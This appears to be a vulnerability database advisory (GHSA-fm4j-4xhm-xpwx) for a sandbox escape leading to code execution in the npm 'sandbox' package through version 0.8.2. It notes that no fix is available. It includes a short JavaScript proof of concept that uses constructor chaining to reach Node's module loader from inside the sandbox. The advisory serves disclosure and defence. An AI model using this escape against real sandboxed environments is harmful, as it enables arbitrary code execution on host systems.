VDB
Sign up
MEDIUM

GHSA-fm4j-4xhm-xpwx

Sandbox Breakout / Arbitrary Code Execution in sandbox

Details

All versions of `sandbox` through 0.8.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.

## Proof of concept ``` var Sandbox = require("sandbox") s = new Sandbox() code = `new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")` s.run(code) ```

## Recommendation

No fix is currently available. Consider using an alternative module until a fix is made available.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/sandbox
Introduced in: 0.0.0

No fixed version published yet for sandbox (npm). Pin to a known-safe version or switch to an alternative.

References